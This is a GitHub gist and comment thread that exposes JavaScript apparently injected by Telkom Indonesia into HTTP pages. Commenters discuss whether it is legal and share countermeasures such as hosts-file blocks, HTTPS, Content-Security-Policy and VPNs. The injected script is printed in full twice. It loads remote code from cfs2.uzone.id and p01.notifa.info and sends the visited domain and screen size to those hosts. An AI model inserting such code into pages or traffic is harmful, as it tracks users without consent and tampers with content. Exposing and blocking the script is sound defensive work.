-
-
Save donnykurnia/2356dad4119ce85d18d18708914c60e3 to your computer and use it in GitHub Desktop.
| <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnCgur28FUm401VrTNseDf2JlEA6ZiOk%2ffQK22KycK5kPdVDjpnejkM9P73Pe7Y6EuuaOitYkmzmKNO8RUzaFdaIXn6R7NkvKk9cKCHQzyvNXXPs%2bsueqLp2EKbC6X0Nu38%2fmvVexzHBsuqHkiQG%2bNd%2bm8E%2f1Gq6XVEDRBd4yBsks3piKPJIEbKaNRdQVxqlbqy5Bs6h0iSFn8zyf11ihllrf6ZNmrJse7MMGOa5Bg8V4gb29r7%2bHjvRblYlXTzoDaVMg79rr8%2fNSZ6ssVfsxi0UIiVvCjFalmdmUa4D3V21bRqM4cgubmchEbbS%2bil%2bkh%2bMxt3Lc4cILEYiziKexsYIRCUr4wR%2fPBUNQ0j4IIx1jEuAgOLeRdwvvw4aFM0V1i21bvKCvX8DaMIllnngEEJ09Ev%2fVl90I1UyrYKv6AaTOlPRBinecqub0KT%2flfLk3J5BMJsGhRjFCfISXqn01lRdvFPPMPwF0W10PRF8Of4%2feqOmNt6%2f1%2bIe66Xn2XLzyo%2fXuwHgr8%2fESw2BJ%2fexkP13jBCMQ6mGWGfQ671Tl0qDCRxz3%2fSr7a%2fgD3rwBAepraDryNlMplNKwfDkn1RshIR2yOHd%2fT9f%2bWyzvKgo2q%2bBVg19biKxt2MA%2b51lkpH9op3ufeUcUr06SkECqC57ZaT0Gy%2btFzIpw7WrVWNOUR2IagZkIGRtvs8fT78yLbMJYt7QL2KA1NeaqJ1oxvPiRhbpzwbaEvCh2IpkWW4arhunYT9DWgF1jaNRjn1c6n%2fzCUZvEw8o0sgvMEHBsLP0VK4Q%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body> |
| cfs2.uzone.id ip address is 180.250.66.131 | |
| You just need to block this ip address in your router firewall or PC firewall, and the ads will be gone. | |
| Shame on you, Telkom Indonesia. |
is this actually legal? because if it's illegal, we can sue anytime
illegal according to ITE Act article 32 paragraph (1). they changed electronic information when it was transmitted from server to client.
That's stupid telkampret .. inject some error script into website that user visit ..
i've tried so many things to done with this .. but never get done with it ..
Only 1 solution is to use https instead http..
illegal but since this is govt owned then it's legalized internally...
and they can change the domain as the pleases as they technically control the domain registration...
Wow. I've been wondering what that shit was. So it's from my ISP? Damn lol
I have to delete (not using) tag /body and tag /html and Let the browser close the tag it self to prevent this from happening.
I have to delete (not using) tag /body and tag /html and Let the browser close the tag it self to prevent this from happening.
halo mas, gimana cara ngatasi "p01.notifa.info" yg kedetect di avast versi gratis? http://prntscr.com/m2eq6p
notifnya 5 menit sekali. trima kasih
They said it is legal https://twitter.com/TelkomCare/status/1081114210220703744?s=19
Shit.
Yo, is this still a problem?
A quick google search nets me with a ton of articles that this practice is taking all over the world. Worse yet I did not find any possible solutions whatsoever. I guess we have to endure our lives in this ugly capitalist world, unfortunately.
Consider yourselves lucky if you're using an antivirus that blocks this disaster.
"p01.notifa.info" ini udah di auto-block sama antivirus ku (Bitdefender) and was detected as a phishing attempt wkwkwk. Gak repot deh.
Sementara bisa pakai ini https://gist.github.com/abdilahrf/b63b6c0313d77fe2a51e18bfb4a8bb05
untuk linux tambahin di file /etc/hosts & windows /System32/drivers/etc/hosts
They can changed the ip address whenever they want, so in case they did that:
- Just add cfs2.uzone.id to your
/etc/hosts. - Add
cfs2.uzone.idto your adblock blacklisted filter. - And if you manage for multiple environment (home, office, etc), use dedicated dns server, where you can manage by your own.
Be in control of your internet connection!
Just add SSL
@krisnaw yes, if you are a webmaster, adding SSL will prevent your website from getting injected with ads. This gist is for ISP customers that cannot enforce all website to use https. We can still fight back by adding their ads domain into the blacklist.
Comment all tag html, head, body. browser will add it automatically.
sample:
<html> to <!--<html> -->
<head> to <!--<head>-->
so on
Yang penasaran apa aja data yang di ambil
- Website yang kamu kunjungi ( parameter domain )
- Resolusi layar kamu ( parameter sw dan sh )
- Cookie di website yang kalian kunjungi
Query string
id 1
enc 9UwkxLgY9
params 4TtHaUQnUEiP6K/c5C582Am8lISurprAUlOO9Isbj7WdvGI1HwVrd0iTnkVaSNpWp8BVqbjH zdb68ukjSoIxldxgiv/egRUV1841vIHK7UWD0PkGGYzMJJ180SwNm1a1zo3F5TU5SrR2WE5vnn9TcHrSZnriovmGXGFnz9RhTJMnbdDBJ3VMSNlGB7xBcmDhL3PlKKCOGOou xGoRgX4 eOZEWWSZMmJPE/McBD91t1WutHPE4IRToImofbey U0a/0jukLAapg/cTC99YQiknBIfl0wxAiEuyX3GN5kN9acZC /h0a6Tp4BLJtjLm/zGBqcE3rLJ9IhbpUnemvmM4Qv3uTQXazkX bKi4vZfmXD6ktpA sJtW6y3oiTAzr6GHqr/GGPexxhqQR3oMBE2HOVOH190PwkCuzxAQb0CgmTYkDFWZ3 4XFQDuYK8g6L9X3Rm2ndpwGP5upVVzaVW9u/8U IC6/tNc4b8PTymNqu92VNmMAHwNidhU WngbkDutaSLVDqU5drfgcpO7VA==
idc_r 00000000
domain www.example.com
sw 1390
sh 768
wow...
script vs script
The telkom script will replace </body> tag with their script, so we must prevent it with add pre comment tag before </body> tag
This script using jQuery, cause I use it for web
Before </body>, add this script:
<script>
$( function() {
$(this).after("<!--") // the inject will be comment
} );
</script>Join us, in dev.to
the thing is no one in indonesia have enough balls to sue them.
@maulvi the justice system here is hopeless... most of the prosecutor and judges had no knowledge about internet technology. Plus, telkom had put the ads point into the subscription agreement.
But according to this comment, it is not a mere ads if it steal our cookies. Can we report p01.notifa.info and cfs2.uzone.id as deceptive site (malware) here?
Adding those domains to /etc/hosts will only help us, not our web visitors.
Currently, adding SSL is the only clean option. I would not like to mess up my site's DOM by commenting out HTML tags.
It's quite simple, you have to do that with a Content-Security-Policy tag in the index.html
https://content-security-policy.com/
example :
<meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline' 'unsafe-eval' 'self' https://yourdomain.com/* http://yourdomain.com/*; img-src 'self' data: * blob:">
you have to connect VPN and the ads gone.
Inikah yang menyebabkan Ubuntu repository (non secure http) jadi gak bisa diakses?
@ifaniqbal harusnya tidak, karena saya coba test pakai curl, di hasilnya tidak ada tambahan injeksi iklan dari indihome
curl http://buaya.klas.or.id/ubuntu/dists/hirsute/InRelease
Coba test sendiri di tempat kamu.
@ifaniqbal harusnya tidak, karena saya coba test pakai curl, di hasilnya tidak ada tambahan injeksi iklan dari indihome
curl http://buaya.klas.or.id/ubuntu/dists/hirsute/InReleaseCoba test sendiri di tempat kamu.
Hasilnya:
curl: (56) Recv failure: Connection reset by peer
@ifaniqbal kemungkinan karrna setting firewall atau proxy yg digunakan
Inikah yang menyebabkan Ubuntu repository (non secure http) jadi gak bisa diakses?
saya pernah ngalamin juga, terkadang kalo lagi kumat biasanya gak bisa akses http mau update repo harus pake proxy
@ifaniqbal kemungkinan karrna setting firewall atau proxy yg digunakan
Inikah yang menyebabkan Ubuntu repository (non secure http) jadi gak bisa diakses?
saya pernah ngalamin juga, terkadang kalo lagi kumat biasanya gak bisa akses http mau update repo harus pake proxy
Makasih @donnykurnia dan @maulvi. Saya tadi lapor via web indihome, laporannya "tidak bisa update Linux, repo berikut ini erro connection failed". Sudah diselesaikan oleh pihak telkom dengan memindahkan ke jaringan yang tidak "lemot".
Pihak telkom bilang, kalau dapat IP yang di bawah ..*.10 biasanya lemot. Saya dipindahkan ke IP 11 dan hasilnya lancar. Cek IP nya bisa via speedtest
Sekarang sudah bisa lancar sudo apt update
Hit:1 https://download.docker.com/linux/ubuntu hirsute InRelease
Hit:2 https://brave-browser-apt-release.s3.brave.com stable InRelease
Hit:3 https://mirror.amscloud.co.id/ubuntu hirsute InRelease
Hit:4 https://dl.winehq.org/wine-builds/ubuntu hirsute InRelease
Hit:5 https://mirror.amscloud.co.id/ubuntu hirsute-security InRelease
Hit:6 https://mirror.amscloud.co.id/ubuntu hirsute-updates InRelease
Hit:7 https://mirror.amscloud.co.id/ubuntu hirsute-backports InRelease
Hit:8 http://ppa.launchpad.net/linrunner/tlp/ubuntu hirsute InRelease
Hit:9 http://apt.pop-os.org/proprietary hirsute InRelease
Hit:10 http://ppa.launchpad.net/system76/pop/ubuntu hirsute InRelease
Hit:11 https://download.sublimetext.com apt/stable/ InRelease
Hit:12 http://ppa.launchpad.net/ubuntuhandbook1/apps/ubuntu hirsute InRelease
it look appear only http page, nothing on secure page.
here's what i got
if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mr%2fvRbdSFMrh4JdxivCWF5IBgEx%2b518i7w7ix2wtGE6suih3GpzKuQqX0W2%2bZA6JLybv6qXL9CV7ok8vF4B27hRvqA6FSBQunP8hpmmimv5AFTgJeP%2fO3kPpjLpoUd5kfvgm1H0NWW6TarYD%2fpSGv5lGv1OSQIPSh8CvyQrYKRRMRUFYkiwXm1Mbp1LgVMnM9tH3cV3NchDWWsbeTazb7vfZ%2b%2bFj3v1fIWakmhFSMoiFUmKwVGff9kh%2bMQNYrBYFMww4dRAVfW8vxYUXVmujTSFI7FE5jAbjIrGa9Ge8bTjZWpm2vZaKrKn31llH%2bAM1cRpRHfVHrzO2THwSZ5IPIyrIntbw8ZzT5wr9njSHdwzQEhIsFQXeeLgLC2nbouJdOoAFcxNz%2f2Jb1%2fVLtYCxikqjmv5dciCN%2bQuzMcsm7xo1ZDLn5mukwuOOKAF18RxSU5VW7SCrFax10cVS9D6GICQY748msuvJqe06ReNkpTAphjVp%2brdzKgaM%2bGZUfZtsHxT53UW0PZ5NiRUI1ZpffO0BxNZeU%2bpE%2fnfFoCa%2fxFxTxNMvcuMTPuQ%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};